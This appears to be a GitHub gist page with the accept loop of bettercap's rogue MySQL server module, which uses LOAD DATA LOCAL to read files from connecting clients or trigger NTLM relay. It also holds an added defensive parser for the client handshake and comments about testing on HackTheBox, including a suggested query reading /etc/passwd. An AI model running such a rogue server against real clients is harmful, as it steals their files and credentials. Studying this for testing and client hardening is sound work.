Last active May 4, 2020
// Accept loop of the rogue MySQL server (bettercap's mysql.server module).
// mysql.listener, mysql.infile and the log package belong to the module; the
// greeting and response packet bytes are not part of this snippet, so those
// sends are left as comments.
for mysql.Running() {
	// tcp listener
	conn, err := mysql.listener.AcceptTCP()
	if err != nil {
		log.Warning("Error while accepting TCP connection: %s", err)
		continue
	}

	// handle one client inside a closure so that defer closes this
	// connection when its handling ends, not when the whole loop exits
	func() {
		defer conn.Close()
		remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]

		// send the mysql greeting (packet bytes omitted here)

		// read the login request (HandshakeResponse41)
		// TODO: include binary support and files > 16kb
		b := make([]byte, 16384)
		reader := bufio.NewReader(conn)
		n, err := reader.Read(b)
		if err != nil || n < 37 {
			log.Warning("Unexpected login request from %s (%d bytes): %v", remoteAddress, n, err)
			return
		}

		// parse client capabilities and validate connection
		// TODO: parse mysql connections properly and
		// display additional connection attributes
		// bytes 4-5 hold the low 16 capability bits; bit 7 (0x80) is
		// CLIENT_LOCAL_FILES, i.e. the client allows LOAD DATA LOCAL
		clientCapabilities := uint32(b[4]) | uint32(b[5])<<8
		loadData := clientCapabilities&0x80 != 0
		log.Info("MySQL connection from: %s", remoteAddress)
		log.Info("Can Use LOAD DATA LOCAL: %t", loadData)
		// the NUL-terminated username starts at offset 36
		username := bytes.Split(b[36:n], []byte{0})[0]
		log.Info("MySQL Login Request Username: %s", username)

		// send initial responseOK (packet bytes omitted here)

		// read the incoming response and retrieve infile
		infileLen, err := reader.Read(b)
		if err != nil || infileLen < 9 {
			log.Warning("Error while reading buffer (%d bytes): %v", infileLen, err)
			return
		}

		// check if the infile is an UNC path
		if strings.HasPrefix(mysql.infile, "\\") {
			log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
		} else {
			// print the infile content, ignore mysql protocol headers
			// TODO: include binary support and output to a file
			log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b[4:infileLen-4]))
		}

		// send additional response (packet bytes omitted here)
	}()
}
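The snippet above reads the client's login packet at fixed offsets (capability bits at bytes 4-5, username at byte 36) without checking how much was actually read. The parser below is an added example, not code from the gist or from bettercap: it decodes the same HandshakeResponse41 layout into a struct, reports whether the client advertised CLIENT_LOCAL_FILES (the 0x80 capability bit that makes LOAD DATA LOCAL possible, useful when auditing which clients still enable it), and rejects short or inconsistent packets instead of indexing into them, which is the "unexpected buffer size" failure mode. The type and function names are my own, and the sample packet is constructed in buildSample.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// Bit 7 of the client capability flags: the client allows
// LOAD DATA LOCAL INFILE (CLIENT_LOCAL_FILES in the MySQL protocol docs).
const clientLocalFiles = 0x80

// HandshakeResponse holds the fields of a HandshakeResponse41 packet that
// the rogue-server snippet reads at fixed offsets (names are mine).
type HandshakeResponse struct {
	PayloadLen   int
	Capabilities uint32
	Username     string
}

// LocalFilesAllowed reports whether the client advertised CLIENT_LOCAL_FILES,
// i.e. whether it would honour a server's request for a local file.
func (h HandshakeResponse) LocalFilesAllowed() bool {
	return h.Capabilities&clientLocalFiles != 0
}

// ParseHandshakeResponse decodes a raw HandshakeResponse41 packet:
//   bytes 0-2  payload length (little endian), byte 3 sequence id,
//   bytes 4-7  capability flags, 8-11 max packet size, 12 charset,
//   13-35      reserved, 36..  NUL-terminated username.
// A buffer shorter than the fixed header is rejected instead of being
// indexed blindly, which is the "unexpected buffer size" case.
func ParseHandshakeResponse(b []byte) (HandshakeResponse, error) {
	const fixedHeader = 36
	if len(b) < fixedHeader+1 {
		return HandshakeResponse{}, fmt.Errorf("unexpected buffer size %d", len(b))
	}
	payloadLen := int(b[0]) | int(b[1])<<8 | int(b[2])<<16
	if payloadLen+4 > len(b) {
		return HandshakeResponse{}, errors.New("payload length exceeds buffer")
	}
	caps := binary.LittleEndian.Uint32(b[4:8])
	// the username runs from offset 36 to the first NUL byte
	end := fixedHeader
	for end < len(b) && b[end] != 0 {
		end++
	}
	if end == len(b) {
		return HandshakeResponse{}, errors.New("username is not NUL-terminated")
	}
	return HandshakeResponse{
		PayloadLen:   payloadLen,
		Capabilities: caps,
		Username:     string(b[fixedHeader:end]),
	}, nil
}

// buildSample constructs a minimal HandshakeResponse41 packet (constructed
// test input, not a capture) with the given capability flags and username.
func buildSample(caps uint32, user string) []byte {
	payload := make([]byte, 32) // caps(4) + maxpkt(4) + charset(1) + reserved(23)
	binary.LittleEndian.PutUint32(payload[0:4], caps)
	binary.LittleEndian.PutUint32(payload[4:8], 16777216)
	payload[8] = 0x21 // utf8_general_ci
	payload = append(payload, []byte(user)...)
	payload = append(payload, 0) // NUL terminator of the username
	payload = append(payload, 0) // empty auth-response length
	pkt := make([]byte, 4, 4+len(payload))
	pkt[0] = byte(len(payload))
	pkt[1] = byte(len(payload) >> 8)
	pkt[2] = byte(len(payload) >> 16)
	pkt[3] = 1 // sequence id
	return append(pkt, payload...)
}

func main() {
	// constructed sample: protocol 4.1 + secure connection + local files
	pkt := buildSample(0x200|0x8000|clientLocalFiles, "root")
	h, err := ParseHandshakeResponse(pkt)
	if err != nil {
		panic(err)
	}
	fmt.Printf("user=%q local_files=%v\n", h.Username, h.LocalFilesAllowed())

	// a truncated 4-byte read is rejected rather than mis-parsed
	if _, err := ParseHandshakeResponse(pkt[:4]); err != nil {
		fmt.Println("short packet:", err)
	}
}
```

Feeding the parser the bytes of a real login packet (for example from a capture taken against a test server) is the quickest way to confirm whether a given client build still sets CLIENT_LOCAL_FILES; clients that do not set it will never answer a server's LOAD DATA LOCAL request, which is the setting to check when hardening clients.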

guanicoe commented May 4, 2020

@bmaia I did not expect such a swift response. I did check the code in bettercap and saw it was indeed included. I'm about to test your tool on HTB, thanks ;)


guanicoe commented May 4, 2020

Hey again, I'm having an issue with this tool related to bettercap/bettercap#572. Basically I get the [sys.log] [war] mysql.server unpexpected buffer size 4 error (I actually also corrected the typo in the main code).
I don't really know what it means nor how to troubleshoot.



$mariadb -V
mariadb  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
$mysql -V
mysql  Ver 15.1 Distrib 10.3.22-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

Do you think you could help?


bmaia commented May 4, 2020

You can try to use other Rogue MySQL clients like the one below:

The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to LOAD DATA, check the mysql packets and try to replay them (see the snippets below for an example):

load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

The post below is a good (and more recent) reference:


guanicoe commented May 4, 2020

OK, I'll give it a try. I did try it first, but it spat out a lot of exceptions, and after reading your post I thought I'd give bettercap a try as everything was integrated.

error: uncaptured python exception, closing channel <__main__.http_request_handler connected at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/|read|83] [/usr/lib/python2.7/|handle_read_event|449] [/usr/lib/python2.7/|handle_read|147] [|found_terminator|184])


guanicoe commented May 4, 2020

Just to let you know that your module works great, and that I was to blame. The error came from a malformed SQL query.
